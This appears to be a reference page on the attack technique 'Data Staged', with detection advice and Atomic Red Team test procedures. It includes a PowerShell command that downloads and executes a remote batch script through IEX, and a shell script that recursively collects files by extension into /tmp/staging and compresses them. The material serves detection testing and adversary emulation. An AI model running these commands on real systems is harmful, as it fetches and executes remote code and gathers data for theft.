Collected data is staged in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as Data Compressed or Data Encrypted.Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging location.
Detection: Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as Windows Management Instrumentation and PowerShell.
Platforms: Linux, macOS, Windows
Data Sources: File monitoring, Process monitoring, Process command-line parameters
Utilize powershell to download discovery.bat and save to a local file
Supported Platforms: Windows
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat')" > c:\windows\pi.log
Collect all specified file extensions recursively from a specified file path on the target machine. All located files are copied into a temporary location before being compressed.
Supported Platforms: Windows, Linux
| Name | Description | Type | Default Value |
|---|---|---|---|
| path | Path to recursively search from | Path | / |
mkdir -p /tmp/staging
find {{ path }} -name '*{{ extension }}' -exec cp -prv '{}' '/tmp/staging' ';'
tar -zcvf /tmp/staging.tar.gz /tmp/staging/
rm -rf /tmp/staging